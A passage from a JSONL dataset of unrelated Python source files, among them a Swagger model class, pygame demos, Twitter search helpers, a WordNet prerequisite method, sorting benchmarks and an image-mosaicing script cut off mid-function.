:param sender: The sender of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n if sender is not None and len(sender) > 30:\n raise ValueError(\"Invalid value for `sender`, length must be less than or equal to `30`\") # noqa: E501\n\n self._sender = sender\n\n @property\n def priority(self):\n \"\"\"Gets the priority of this VMGroupMessageItem. # noqa: E501\n\n Priority # noqa: E501\n\n :return: The priority of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._priority\n\n @priority.setter\n def priority(self, priority):\n \"\"\"Sets the priority of this VMGroupMessageItem.\n\n Priority # noqa: E501\n\n :param priority: The priority of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._priority = priority\n\n @property\n def status(self):\n \"\"\"Gets the status of this VMGroupMessageItem. # noqa: E501\n\n Status # noqa: E501\n\n :return: The status of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this VMGroupMessageItem.\n\n Status # noqa: E501\n\n :param status: The status of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._status = status\n\n @property\n def date_modified(self):\n \"\"\"Gets the date_modified of this VMGroupMessageItem. # noqa: E501\n\n Date Modified # noqa: E501\n\n :return: The date_modified of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._date_modified\n\n @date_modified.setter\n def date_modified(self, date_modified):\n \"\"\"Sets the date_modified of this VMGroupMessageItem.\n\n Date Modified # noqa: E501\n\n :param date_modified: The date_modified of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._date_modified = date_modified\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, VMGroupMessageItem):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"starrez_client/models/vm_group_message_item.py","file_name":"vm_group_message_item.py","file_ext":"py","file_size_in_byte":11999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"337969762","text":"import numpy as np\nimport torch, torchvision\nfrom net.utils.graph import Graph\n\n\ndef get_hop_distance(num_node, edge, max_hop=1):\n A = np.zeros((num_node, num_node))\n for i, j in edge: # 构建邻接矩阵\n A[j, i] = 1 # 等同于A[j][i]\n A[i, j] = 1\n hop_dis = np.zeros((num_node, num_node)) + np.inf\n transfer_mat = [np.linalg.matrix_power(A, d) for d in range(max_hop + 1)] # 方矩阵乘法 d<0--对角矩阵;d>0--进行A的连乘\n temp = np.stack(transfer_mat)\n arrive_mat = (np.stack(transfer_mat) > 0) # transfer_mat是list类型,需要将list堆叠成一个数组才能进行>操作\n for d in range(max_hop, -1, -1):\n hop_dis[arrive_mat[d]] = d\n return A\n\n\ndef normalize_digraph(A): # 图卷积的预处理\n Dl = np.sum(A, 0) # n*n矩阵求和变为n*1\n num_node = A.shape[0]\n Dn = np.zeros((num_node, num_node))\n for i in range(num_node):\n if Dl[i] > 0:\n Dn[i, i] = Dl[i] ** (-1) # 由每个点的度组成的对角矩阵\n AD = np.dot(A, Dn)\n return AD\n\n\nnum_node = 18\nself_link = [(i, i) for i in range(num_node)]\nneighbor_link = [(4, 3), (3, 2), (7, 6), (6, 5), (13, 12), (12,\n 11),\n (10, 9), (9, 8), (11, 5), (8, 2), (5, 1), (2, 1),\n (0, 1), (15, 0), (14, 0), (17, 15), (16, 14)]\nedge = self_link + neighbor_link\nA = get_hop_distance(num_node, edge)\n# Graph.get_adjacency(A, 'spatial')\na = [[1, 2], [3, 4]]\nb = [[5, 6], [6, 7]]\nB = np.append(A, A)\nC = [[1,2], [3, 4], [5, 6], [6, 7]]\nC.append(a)\nC = np.array(C)\n\n#C_stack = np.stack(C)\nprint(C)\nprint('-----------------------------------------------------')\n#print(C_stack.shape)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173881854","text":"import pygame, graphics, math, ast\nfrom graphics import Box, BoxText, Text\n\nNA = 0\n\nSWIDTH = 1000\nSHEIGHT = 700\n\nLINEWIDTH = 6\nARROWLENGTH = 30\n\nROWSPACING = 25\n\ncx = SWIDTH / 2\ncy = SHEIGHT / 2\n\nyi = 20\n\n\ndef main():\n with open('assets/examples.txt') as f:\n example_data = f.readlines()\n examples = create_file_list(example_data)\n print(\"Possible word options:\")\n print_list(examples)\n word_of_interest = \"'\" + input(\"Input a word of interest: \") + \"'\"\n \n tree = create_tree_file(example_data, word_of_interest)\n tree = ast.literal_eval(tree)\n \n \"\"\"\n tree = [[{\"Language\":\"English\",\"Word\":\"'God be with you!'\"},{\"Language\":\"English\",\"Word\":\"'good'\"},\n {\"Language\":\"English\",\"Word\":\"'good morning'\"}],\n [{\"Language\":\"\",\"Word\":\"'goodbye'\"},{\"Language\":\"\",\"Word\":\"'goodbye'\"},\n {\"Language\":\"\",\"Word\":\"'goodbye'\"}]]\n \"\"\"\n \n pygame.init()\n\n screen = def_screen(SWIDTH, SHEIGHT)\n clock = pygame.time.Clock()\n running = True\n screen_dragging = False\n obj = []\n\n fontr = pygame.font.Font(\"assets/OpenDyslexic3-Regular.ttf\", 20)\n fontb = pygame.font.Font(\"assets/OpenDyslexic3-Bold.ttf\", 20)\n view_pos = 0, 0\n\n y = yi\n y, words = create_word(word_of_interest, fontr, fontb, yi)\n y += 2 * ROWSPACING\n y, branches = create_tree(tree, y, fontr, fontb)\n \n obj += branches\n obj += words\n\n obj += branches\n obj += words\n\n prev_mouse_pos = 0, 0\n\n while running:\n # main loop\n clock.tick(120)\n screen.fill(graphics.black)\n\n for el in obj:\n el.render(screen, view_pos)\n\n # events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n screen_dragging = True\n prev_mouse_pos = event.pos\n\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n screen_dragging = False\n\n elif event.type == pygame.MOUSEMOTION and screen_dragging:\n view_pos = view_pos[0] + prev_mouse_pos[0] - event.pos[0], \\\n view_pos[1] + prev_mouse_pos[1] - event.pos[1]\n prev_mouse_pos = event.pos\n\n pygame.display.flip()\n \ndef print_list(array):\n for el in array:\n print(el)\n\ndef create_file_list(file):\n array = []\n append = False\n for line in file:\n word = \"\"\n for char in line:\n if char == \"/\":\n break\n elif char != \"-\" and (char != '\"'):\n word += char\n append = True\n elif char == \"-\":\n break\n if append:\n array.append(word)\n append = False\n return array\n\ndef create_tree_file(file, word):\n add_char = False\n search = False\n tree = \"\"\n for line in file:\n if search:\n if \"/\" in line:\n for char in line:\n if char != \"/\":\n tree += char\n else:\n break\n elif word in line:\n search = True\n for char in line:\n if add_char == True:\n tree += char\n elif char == \"-\":\n add_char = True\n return tree\n \n\ndef create_word(word, font_text, font_title, yi):\n words = []\n # create object \"Word:\"\n word_txt = Text(\"Word:\", font_title, center_x=cx, y=yi)\n words.append(word_txt)\n # create object for the chosen word.\n y = yi + word_txt.rect.height + ROWSPACING * (3 / 4)\n word = BoxText(word, font_text, center_x=cx, y=y)\n words.append(word)\n\n yf = y + word.box.rect.height\n\n return yf, words\n\n\ndef create_tree(tree, starting_y, font_text, font_title):\n \"\"\"\n The tree should be of the form\n [[{\"Language\": \"Latin\", \"Word\": \"'sonus'\"}, {\"Language\": \"\", \"Word\": \"\"}],\n [{\"Language\": \"Anglo-Norman French\", \"Word\": \"'soun/suner'\"}, {\"Language\": \"\", \"Word\": \"\"}],\n [{\"Language\": \"Middle English\", \"Word\": \"'soun'\"},{\"Language\": \"English\", \"Word\": \"'-d'\"}],\n [{\"Language\": \"\", \"Word\": \"'sound'\"}, {\"Language\": \"\", \"Word\": \"'sound'\"}]]\n with \"\" representing empty space. Location of empty and non-empty space and the same dictionary (combined branches)\n indicate the tree branches. The list goes from top to bottom. The last word should not have language written down.\n Put repeating elements next to one another, in the columns where they step from. Please put the \"Word\"s in quotes for clarity.\n \"\"\"\n # [[language y], [word y]]\n columns = len(tree[0])\n col_spacing = SWIDTH / (columns + 1)\n prevcols = None\n y_larrow = 0\n row = 0\n obj = []\n overlap = 2\n\n # create object \"Origin Tree:\"\n y_tot = starting_y\n origin_txt = Text(\"Origin Tree:\", font_title, center_x=cx, y=y_tot)\n obj.append(origin_txt)\n\n y_tot += origin_txt.rect.height + ROWSPACING - (ARROWLENGTH + 2 * ROWSPACING)\n\n for row in tree:\n y_vals = [[0], [0], [0]]\n heights = [[0], [0], [0]]\n\n y_larrow = y_tot + ROWSPACING\n\n y_tot += ARROWLENGTH + 2 * ROWSPACING\n\n elements = []\n count = 1\n prev_el = None\n for col in range(len(row)):\n if prev_el is not None and row[col]['Word'] == prev_el['Word'] and row[col]['Language'] == prev_el['Language'] and not (row[col]['Word'] == \"\" and row[col]['Word'] == \"\"):\n count += 1\n if col == len(row) - 1:\n elements.append({\"Language\": row[col][\"Language\"], \"Word\": row[col][\"Word\"], \"Count\": count})\n else:\n if prev_el is not None:\n elements.append({\"Language\": prev_el[\"Language\"], \"Word\": prev_el[\"Word\"], \"Count\": count})\n if col == len(row) - 1:\n elements.append({\"Language\": row[col][\"Language\"], \"Word\": row[col][\"Word\"], \"Count\": count})\n count = 1\n\n prev_el = row[col]\n \n print(\"elements:\", elements)\n\n if prevcols is not None:\n y_hline = y_larrow\n for el in elements:\n el_count = el[\"Count\"]\n if el_count > 1:\n x_hline = (elements.index(el) + 1) * col_spacing - LINEWIDTH / 2\n len_hline = col_spacing * (el_count - 1)\n hline = Box(x=x_hline, y=y_hline, width=len_hline, height=LINEWIDTH)\n obj.append(hline)\n\n columns = len(elements)\n col_spacing = SWIDTH / (columns + 1)\n\n for el in elements:\n y_lang = y_word = y_tot\n\n if el[\"Language\"] != \"\":\n lang = BoxText(el[\"Language\"], font_text, center_x=0, y=y_lang)\n\n y_cline = y_lang + lang.box.rect.height - overlap\n y_word = y_lang + lang.box.rect.height + ROWSPACING\n\n y_vals[0].append(y_lang)\n heights[0].append(lang.box.rect.height)\n\n if el[\"Word\"] != \"\":\n word = BoxText(el[\"Word\"], font_text, center_x=0, y=y_word)\n\n y_vals[1].append(y_word)\n heights[1].append(word.box.rect.height)\n\n if el[\"Language\"] != \"\" and el[\"Word\"] != \"\":\n len_cline = abs(word.box.rect.centery - lang.box.rect.centery - lang.box.rect.height + overlap * 2)\n cline = Box(center_x=0, y=y_cline, width=LINEWIDTH, height=len_cline)\n\n y_vals[2].append(y_cline)\n heights[2].append(cline.rect.height)\n\n y_lang = max(y_vals[0])\n y_word = max(y_vals[1] + y_vals[0])\n y_cline = max(y_vals[2])\n y_tot += max(heights[0]) + max(heights[1]) + max(heights[2]) - 2 * overlap\n\n x_col = 0\n for el in elements:\n x_col += col_spacing\n if el[\"Language\"] != \"\":\n lang = BoxText(el[\"Language\"], font_text, center_x=x_col, y=y_lang)\n obj.append(lang)\n\n if el[\"Word\"] != \"\":\n word = BoxText(el[\"Word\"], font_text, center_x=x_col, y=y_word)\n obj.append(word)\n\n if el[\"Language\"] != \"\" and el[\"Word\"] != \"\":\n cline = Box(center_x=x_col, y=y_cline, width=LINEWIDTH, height=len_cline)\n obj.append(cline)\n \n\n if prevcols != None:\n x_col = 0\n prevel = 0\n for el in row:\n x_col += col_spacing\n if prevel != el:\n row_i = tree.index(row)\n el_i = row.index(el)\n row_up = tree[row_i - 1]\n el_up = row_up[el_i]\n \n if (el[\"Word\"] != \"\" or el[\"Language\"] != \"\") and (el_up[\"Word\"] != \"\" or el_up[\"Language\"] != \"\"):\n larrow = Box(center_x=x_col, y=y_larrow, width=LINEWIDTH, height=ARROWLENGTH)\n obj.append(larrow)\n prevel = el\n\n prevcols = columns\n\n return y_tot, obj\n\ndef drawTriangle(window, center, radius, width, color, rotation):\n dx = dy = 0\n\n pointlist = []\n\n for i in range(2):\n \n pointlist.append((radius+center[0]+dx, dy+center[1]))\n\n # Rotate the corner by 60 degrees\n dy += math.sin(math.pi / 3)\n dx += math.cos(math.pi / 3)\n \n return pygame.draw.polygon(window, color, pointlist, width)\n\ndef branch_space(branches):\n return SWIDTH / (branches + 1)\n\n\ndef def_screen(width, height):\n return pygame.display.set_mode((width, height))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"267103335","text":"# Tree Node\nclass Node:\n def __init__(self, data, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\ndef valid_tree(root):\n nums = []\n # inorder走一遍\n traversal(root, nums)\n\n # 檢查走訪的order是否正確(正確: 小->大)\n for i in range(len(nums)-1):\n if nums[i] > nums[i+1]:\n return True\n return False\n\ndef traversal(node, nums):\n if node == None:\n return\n traversal(node.left, nums)\n nums.append(node.data)\n traversal(node.right, nums)\n\nif __name__ == '__main__':\n # inputs = [5,1,4,None,None,3,6]\n root = Node(5)\n root.left = Node(1)\n root.right = Node(4)\n root.left.left = None\n root.left.right = None\n root.right.left = Node(3)\n root.right.right = Node(6)\n \n # inputs = [2,1,3]\n # root = Node(2)\n # root.left = Node(1)\n # root.right = Node(3)\n \n print(valid_tree(root))\n","sub_path":"interviews/sourcezones_exam/2_valid_tree.py","file_name":"2_valid_tree.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252639459","text":"import twitter\nimport os\nfrom dotenv import load_dotenv\nfrom urllib.parse import unquote\nfrom data_collection.db_utils import save_tweets_to_mongodb\nimport logging\n\n\ndef setup_twitter_api(retry=False):\n \"\"\"\n Returns an instance of the Twitter object which can be used to make subsequent queries\n :param retry: indicates whether to retry a request when the rate limit is reached\n \"\"\"\n # Setup Twitter API\n load_dotenv()\n\n api_key = os.getenv(\"TWITTER_API_KEY\")\n api_secret = os.getenv(\"TWITTER_API_SECRET\")\n\n auth = twitter.oauth.OAuth(\"\", \"\", api_key, api_secret)\n\n return twitter.Twitter(auth=auth, retry=retry)\n\n\ndef get_query_args(users_list, to_or_from=\"from\", since_id=None):\n \"\"\"\n Get arguments for search query for tweets from users or replies to to users\n :param users_list: List of users from whom to retrieve the tweets.\n :param to_or_from: Whether the query should retrieve tweets to (replies) or from these accounts.\n :param since_id: Id of the tweet whose date is the earliest date from which to retrieve tweets\n :return: a dict object with the arguments\n \"\"\"\n\n # This creates a query of the form \"to:user1 OR to:user2...\" or \"from:user1 OR from:user2\"\n query_string = \" OR \".join([\"{}:{}\".format(to_or_from, user) for user in users_list])\n\n kwargs = {'q': query_string}\n if since_id is not None:\n kwargs['since_id'] = since_id\n\n return kwargs\n\n\ndef process_request(twitter_api, kwargs=None):\n \"\"\"\n Processes a request based on a query string.\n :param twitter_api: The twitter api object.\n :param kwargs: arguments to pass into the search query\n :return: a dictionary with the tweets returned from the twitter api.\n \"\"\"\n tweets = {'statuses': [], 'search_metadata': {'next_results': \"\"}}\n try:\n tweets = twitter_api.search.tweets(**kwargs, tweet_mode='extended')\n except Exception as e:\n logging.debug(\"Exception: {}\".format(e))\n\n return tweets\n\n\ndef get_tweets(initial_kwargs, twitter_api):\n \"\"\"\n Retrieves tweets from the twitter api based on the query string and saves them to the database.\n :param initial_kwargs: Dictionary of arguments for the search query.\n :param twitter_api: The twitter api object.\n :return: Number of tweets retrieved for these arguments\n \"\"\"\n tweets = process_request(twitter_api, kwargs=initial_kwargs)\n num_of_requests_made = 0\n statuses = tweets['statuses']\n search_results = tweets\n tweets_retrieved = 0\n while True:\n if len(statuses) >= 100:\n save_tweets_to_mongodb(statuses)\n tweets_retrieved += len(statuses)\n statuses = []\n try:\n next_results = search_results['search_metadata']['next_results']\n kwargs = dict([kv.split(\"=\") for kv in unquote(next_results[1:]).split(\"&\")])\n search_results = process_request(twitter_api, kwargs=kwargs)\n statuses += search_results['statuses']\n num_of_requests_made += 1\n except Exception as e:\n logging.info(\"No 'next_results', exiting: {}\".format(e))\n break\n\n if len(statuses) > 0:\n save_tweets_to_mongodb(statuses)\n tweets_retrieved += len(statuses)\n logging.info(\"Number of requests before no results: {}\".format(num_of_requests_made + 1))\n return tweets_retrieved\n","sub_path":"data_collection/twitter_api_utils.py","file_name":"twitter_api_utils.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"95399873","text":"import c2py\nfrom repeat import *\n\nADDRESS = 0x0F\n\nPWM_CMD_SET = 1\n\ndef setpos( s, pos ):\n \"\"\"Set servo number s to position pos.\n Pos ranges between 0 and 100. \"\"\"\n\n pos = int((pos/100.0) * 180)\n\n v = pos << 8 | s\n\n setword( ADDRESS, PWM_CMD_SET, v)\n\n","sub_path":"boards/slug/pyenv/tag/0.03/pwm.py","file_name":"pwm.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"532951781","text":"# permet d'accéder aux fonctions du module pygame\nimport pygame\n \n# Define some colors\nBLACK = [0, 0, 0]\nWHITE = [255, 255, 255]\nGREEN = [0, 255, 0]\nRED = [255, 0, 0]\nBLUE = [0 , 0 , 255]\n \n# initialisation de l'écran de jeu\npygame.init()\n \n# Set the height and width of the screen\nscreen_size = [800, 600]\nscreen = pygame.display.set_mode(screen_size)\n \npygame.display.set_caption(\"Bouncing Ball\")\n \n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n \n# Starting position \nbox_x = 50\nbox_y = 300\n \n# Speed and direction\nbox_change_x = 3\nbox_change_y = 3\n\n# Size\nbox_rayon= 5 * 2\n\n# Loop until the user clicks the close button.\ndone = False\n\n# État du colour du palet\netat = 0\n \n# -------- Main Program Loop -----------\nwhile not done:\n event = pygame.event.Event(pygame.USEREVENT) # Remise à zero de la variable event\n\t\n # EVENEMENTS\n # détecte le clic sur le bouton close de la fenêtre\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n \n # LOGIQUE\n # Move the rectangle \n box_x += box_change_x\n box_y += box_change_y\n \n # Rebond\n if box_y > screen_size[1] or box_y < 0:\n box_change_y = box_change_y * -1\n etat = 1 - etat\n if box_x > screen_size[0] or box_x < 0:\n box_change_x = box_change_x * -1\n etat = 1 - etat\n \n #DESSIN\n # Set the screen background\n screen.fill(WHITE)\n \n # Draw screen border\n pygame.draw.rect(screen,GREEN,[0,0, screen_size[0] , screen_size[1]],1)\n \n #dessine le palet\n pygame.draw.circle(screen, BLUE, [box_x, box_y], box_rayon * 5)\n if etat == 0:\n pygame.draw.circle(screen, RED, [box_x, box_y], box_rayon )\n else:\n pygame.draw.circle(screen, GREEN, [box_x, box_y], box_rayon )\n # Limit to 30 frames per second\n clock.tick(30)\n \n # bascule l'affichage à l'écran\n pygame.display.flip()\n\n #debug\n #print('position ({0:3d},{1:3d}) and (dx,dy): ({2},{3})'.format(box_x,box_y,box_change_x,box_change_y))\n \n# Close everything down\npygame.quit()\n","sub_path":"EX 1 bouncing ball.py","file_name":"EX 1 bouncing ball.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453423104","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport nltk;\nfrom nltk.corpus import wordnet as wn;\nfrom app import db\nfrom app.models import Baseline_Methods\n\nclass Method_1():\n \"\"\" Class for evaluating prerequisite relationship using \n hyponyms, hypernyms and meronyms \"\"\"\n \n def __init__(self, words, bid, cap):\n self.words = words\n self.bid = bid\n self.cap = cap\n self.pre_req = dict.fromkeys(words)\n for word in self.pre_req:\n self.pre_req[word] = []\n\n\n def hyponyms(self, concept):\n \"\"\" get a concept and takes all meanings from wordnet. Then gets all the hyponyms of \n that word and check if it's inside the list words\"\"\"\n meanings = wn.synsets(concept)\n for word in meanings:\n for types in word.hyponyms():\n for lemma in types.lemmas():\n self.search_hypo(concept, lemma.name().lower())\n \n def hypernyms(self, concept):\n \"\"\" get a concept and takes all meanings from wordnet. Then gets all the hypernyms of \n that word and check if it's inside the list words\"\"\"\n meanings = wn.synsets(concept)\n for word in meanings:\n for paths in (word.hypernym_paths()):\n for level in paths:\n for lemma in level.lemmas():\n self.search(concept, lemma.name().lower())\n \n def meronyms(self, concept):\n \"\"\" get a concept and takes all meanings from wordnet. Then gets all the different meronyms of \n that word and check if it's inside the list words\"\"\"\n meanings = wn.synsets(concept)\n for word in meanings:\n for meronym in word.part_meronyms():\n for lemma in meronym.lemmas():\n self.search(concept, lemma.name().lower())\n for meronym in word.substance_meronyms():\n for lemma in meronym.lemmas():\n self.search(concept, lemma.name().lower())\n for meronym in word.member_holonyms():\n for lemma in meronym.lemmas():\n self.search(concept, lemma.name().lower())\n \n \n def search(self, concept, lemma):\n if(lemma in self.words):\n self.pre_req[concept].append(lemma)\n \n def search_hypo(self, concept, lemma):\n if(lemma in self.words):\n self.pre_req[lemma].append(concept)\n \n def populate_db(self, words, bid, cap):\n \"\"\" loop inside words and create or update the corrisponding row in Baseline_methods table. The value of m1 is based \n on the presence of lemma2 inside pre_req[lemma1] \"\"\"\n for concept in words:\n for lemma in [lemma for lemma in words if concept != lemma]:\n bs = Baseline_Methods.query.filter_by(bid=bid, cap=cap, lemma1=concept, lemma2=lemma).first()\n if not bs:\n if lemma in self.pre_req[concept]:\n bs = Baseline_Methods(bid=bid, cap=cap, lemma1=concept, lemma2=lemma, m1=1)\n db.session.add(bs)\n else:\n bs = Baseline_Methods(bid=bid, cap=cap, lemma1=concept, lemma2=lemma, m1=0)\n db.session.add(bs)\n else: \n if lemma in self.pre_req[concept]:\n bs.m1 = 1 \n elif not bs.m1:\n bs.m1 = 0\n db.session.commit()\n \n def method_1(self):\n self.words = [word.lower() for word in self.words]\n \n \n for i,word in enumerate(self.words):\n self.words.remove(word)\n self.hyponyms(word)\n self.hypernyms(word)\n self.meronyms(word)\n self.words.insert(i, word)\n \n self.populate_db(self.words, self.bid, self.cap)","sub_path":"app/Method_01.py","file_name":"Method_01.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"421918357","text":"import json\nimport time\n\nfrom admanagerplusclient.base import Base\n\n\nclass Deal(Base):\n\n def get_all(self, seat_id):\n deals = []\n added = {}\n page = 0\n limit = 100\n\n while True:\n page += 1\n expected_total = page * limit\n endpoint = f\"{self.dsp_host}/traffic/deals\"\n params = {\n \"page\": page,\n \"limit\": limit,\n \"seatId\": seat_id\n }\n\n response = json.loads(self.make_request(endpoint, self.headers, 'GET', params=params))\n\n if response.get('msg_type') == \"error\":\n for error in response.get('data').get('validationMessages'):\n if error.get('propertyName') == \"RPM\":\n print(\"\")\n print(\"\")\n print(\"\")\n print(\"Traffic Limit Exceeded Sleeping...\")\n time.sleep(61)\n print(\"\")\n print(\"\")\n print(\"\")\n\n response = json.loads(self.make_request(endpoint, self.headers, 'GET', params=params))\n\n if response.get('msg_type') == \"success\":\n for deal in response.get('data').get('response'):\n deal_id = deal.get('exchangeDealId')\n push_id = deal.get('id')\n\n if added.get(push_id) is None:\n added[push_id] = deal_id\n deals.append(deal)\n\n if int(len(deals)) != int(expected_total):\n break\n\n response['data'] = deals\n\n return json.dumps(response)\n","sub_path":"admanagerplusclient/deal.py","file_name":"deal.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"260228992","text":"import pandas as pd\nimport os\n\nfrom django.conf import settings\n\nfrom common.command import Command\nfrom scraper.feature.ids import IDSParser\n\n\nclass Command(Command):\n help = 'Add TLDs features for domains'\n input_file = os.path.join(settings.R, 'train_2w.csv')\n output_file = os.path.join(settings.R, 'train_2w_tld.csv')\n\n def handle(self, *args, **options):\n\n self.info('Add TLDs features for domains')\n\n df = pd.read_csv(self.input_file)\n good_df = df[df['price'] > 0]\n\n domains = list(good_df.fullname)\n names = [fullname.split('.')[0] for fullname in domains]\n\n ids = IDSParser()\n\n res = ids.get(names, num_workers=100)\n\n self.info('Done getting TLD features from IDS')\n\n df = pd.DataFrame(res)\n df.to_csv(self.output_file, index=False)\n\n self.info('Done writing TLD features from IDS')\n","sub_path":"flipdom/management/commands/add_tlds.py","file_name":"add_tlds.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404385005","text":"import random\nimport timeit\nimport matplotlib.pyplot as plt\n\n\ndef gnome_sort(lista):\n tam = len(lista)\n index = 0\n while index < tam:\n if index == 0:\n index = 1\n if lista[index] >= lista[index - 1]:\n index = index + 1\n else:\n lista[index], lista[index - 1] = lista[index - 1], lista[index]\n index = index - 1\n\n\ndef desenha_grafico(x, y, file_name, label1, xl=\"Entradas\", yl=\"Saídas\"):\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(111)\n ax.plot(x, y, label=label1)\n ax.legend(bbox_to_anchor=(1, 1),bbox_transform=plt.gcf().transFigure)\n plt.ylabel(yl)\n plt.xlabel(xl)\n fig.savefig(file_name)\n\n\ntam = [10000,20000,50000,100000]\ntimes = []\nfor i in range(len(tam)):\n lista_aleatoria = list(range(1, tam[i] + 1))\n random.shuffle(lista_aleatoria)\n times.append(timeit.timeit(\"gnome_sort({})\".format(lista_aleatoria),\n setup=\"from __main__ import gnome_sort\", number=1))\n\n\ndesenha_grafico(tam, times, \"GraficoTempo.png\", \"Tempo gasto pelo gnome_sort\", xl=\"Tamanho da lista\", yl=\"Tempo\")\n","sub_path":"cont_11/gnome_sort.py","file_name":"gnome_sort.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"159652659","text":"\"\"\"\n================================================\nSVM: Separating hyperplane with weighted classes\n================================================\n\n\"\"\"\n\nimport numpy as np\nimport pylab as pl\nfrom scikits.learn import svm\n\n# we create 40 separable points\nnp.random.seed(0)\nn_samples_1 = 1000\nn_samples_2 = 100\nX = np.r_[1.5*np.random.randn(n_samples_1, 2), 0.5*np.random.randn(n_samples_2, 2) + [2, 2]]\nY = [0]*(n_samples_1) + [1]*(n_samples_2)\n\n# fit the model and get the separating hyperplane\nclf = svm.SVC(kernel='linear')\nclf.fit(X, Y)\n\nw = clf.coef_[0]\na = -w[0]/w[1]\nxx = np.linspace(-5, 5)\nyy = a*xx - (clf.intercept_[0])/w[1]\n\n\n# get the separating hyperplane using weighted classes\nwclf = svm.SVC(kernel='linear')\nwclf.fit(X, Y, {1: 10})\n\nww = wclf.coef_[0]\nwa = -ww[0]/ww[1]\nwyy = wa*xx - (wclf.intercept_[0])/ww[1]\n\n# plot separating hyperplanes and samples\npl.set_cmap(pl.cm.Paired)\npl.plot(xx, yy, 'k-')\npl.plot(xx, wyy, 'k--')\npl.scatter(X[:,0], X[:,1], c=Y)\n\npl.axis('tight')\npl.show()\n\n","sub_path":"examples/svm/plot_weighted_classes.py","file_name":"plot_weighted_classes.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"479586739","text":"\"\"\"\nWritten by S Divakar Bhat\nRoll No: 18307R004\nTitle: Generalised panoramic mosaicing\n\"\"\"\n\nimport argparse\nimport os\nimport cv2\nimport numpy as np\n# import matplotlib.pyplot as plt\n\n\ndef get_kps_ftrs(image):\n \"\"\"\n Function to get keypoints and features of image using ORB\n \"\"\"\n orb = cv2.ORB_create()\n return orb.detectAndCompute(image, None)\n\n\ndef get_homography(ref_image, image2):\n \"\"\"\n Get homography matrix for each pair of images\n Input: two images\n Output: Homography matrix\n \"\"\"\n kps1, ftrs1 = get_kps_ftrs(ref_image)\n kps2, ftrs2 = get_kps_ftrs(image2)\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matched = matcher.match(ftrs1, ftrs2)\n matched.sort(key=lambda x: x.distance)\n matched = matched[:int(len(matched)*0.9)]\n kps1 = np.array([kps.pt for kps in kps1])\n kps2 = np.array([kps.pt for kps in kps2])\n pts1 = np.array([kps1[x.queryIdx] for x in matched])\n pts2 = np.array([kps2[x.trainIdx] for x in matched])\n homo, _ = cv2.findHomography(pts2, pts1, cv2.RANSAC, 5)\n return homo\n\n\ndef assign_pxl(img1, img2):\n \"\"\"\n assign pixel values by comparing the pixel locatiosn of left\n and warped image on right\n Input: Left and right image\n Output: combined image\n \"\"\"\n h_1, w_1 = img1.shape[:2]\n for i in range(w_1):\n for j in range(h_1):\n if(np.array_equal(img1[j, i], np.array([0, 0, 0])) 